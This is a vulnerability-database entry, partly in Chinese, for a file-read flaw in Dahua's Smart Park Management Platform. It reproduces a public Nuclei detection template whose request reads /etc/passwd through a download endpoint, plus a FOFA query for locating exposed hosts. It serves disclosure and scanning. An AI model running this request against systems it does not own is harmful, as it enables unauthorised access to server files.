dahua-wpms-lfi: Dahua Smart Park Management Platform - Arbitary File Read

日期: 2025-08-01 | 影响软件: Dahua Smart Park Management Platform | POC: 已公开

漏洞描述

Dahua Smart Park Management Platform is vulnerable to Local File Inclusion.

PoC代码[已公开]

id: dahua-wpms-lfi

info:
  name: Dahua Smart Park Management Platform - Arbitary File Read
  author: DhiyaneshDk
  severity: high
  description: Dahua Smart Park Management Platform is vulnerable to Local File Inclusion.
  reference:
    - https://mp.weixin.qq.com/s/uRhVl2XC5fTNKO8eDFFebA
    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/dahua_zhyq_attachment_fileread.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
  tags: lfi,dahua,wpms,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - filename=passwd

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220198d6d46010fbe3377efa3e10399986707a58b88574b18e3624e758586d821f302203d3a8d98d05ea10fa477719b9e76e4af0bfcd8f39c0c7146ce8ba66de5cd0af7:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/dahua/dahua-wpms-lfi.yaml